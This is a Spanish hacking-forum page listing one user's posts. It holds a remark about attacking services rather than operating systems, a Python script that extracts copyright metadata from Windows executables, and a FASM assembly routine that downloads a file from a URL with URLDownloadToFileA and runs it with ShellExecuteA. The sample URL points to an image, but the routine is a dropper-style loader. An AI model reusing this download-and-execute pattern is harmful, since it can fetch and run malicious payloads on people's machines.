Muy bueno! 
-Saludos-

-Saludos-
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes MenúNo tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Estoy cansadito de estas lecciones en las que enseñan a atacar un "sistema operativo", olvidate.
El vulnerable no es el sistema sino los servicios activos y que en determinadas versiones de X Sistemas vienen con una versión vulnerable.
Así que fuera el mito de "KIERO JACKIAR UN GUINDOUS 7" y centrate más en recopilar información sobre los servicios.
#Author: k0ws
#Use: <filename.py> -f filename.exe
import pefile,sys
def ExeMetadata():
try:
if (sys.argv[1] == "-h"):
print '\nUse: py_filename.py -f exe_file_location';
return;
else:
sExe = pefile.PE(sys.argv[2]);
sDump1 = sExe.dump_info();
sDump2 = sDump1.split('[VS_FIXEDFILEINFO]');
sDump3 = sDump2[1].split('----------Resource directory----------');
sDump4 = sDump3[0].split('LegalCopyright');
sFinalDump = sDump4[1].split('[VarFileInfo]')
sF = repr(sFinalDump[0]);
sF2 = sF.replace('\\xae','').replace('\\xa9','').replace('\n',' ').replace('\ ','');
print ' \n LegalCopyright' + eval(sF2)
except:
print 'Fichero no encontrado!'
ExeMetadata()
include 'include\win32ax.inc' ;Incluimos para el uso de ciertas apis.
.data ;Seccion de datos.
remote_file db 'http://underc0de.org/foro/Themes/underc0de/images/theme/logo.png',0 ;Definimos una variable para la URL.
local_file db 'deje.png',0 ;Definimos otra variable para el nombre del archivo local.
.code ;Seccion de codigo.
start: ;Comenzamos el codigo
call loading ;Llamamos a la subrutina para cargar las funciones necesarias.
call download ;Llamamos a la subrutina para descargar el archivo.
call execute ;Llamamos a la subrutina para ejecutar el archivo.
exit:
invoke ExitProcess,0 ;Salida del programa.
.end start ;Terminamos.
download: ;Cargamos en la pila los datos necesarios mediante push.
push eax
push 0
push 0
push local_file
push remote_file
push 0
call eax ;llamamos a la funcion UrlDownloadToFileA (Su direccion)
pop eax ;La sacamos de la pila.
invoke FreeLibrary, eax ; "La Liberamos"
call execute ; Nos vamos a la ejecucion del archivo.
loading:
invoke LoadLibrary, 'urlmon.dll' ;Llamamos a la libreria que contiene nuestra funcion.
invoke GetProcAddress, eax, 'URLDownloadToFileA' ;Sacamos la direccion de nuestra funcion.
call download ;Una vez definida la funcion a usar, podemos para a descargar el fichero.
execute:
invoke ShellExecuteA, 0, 0, local_file, 0, 0, SW_SHOW ;Ejecutamos el archivo y salimos...
call exit ;Llamamos a la salida...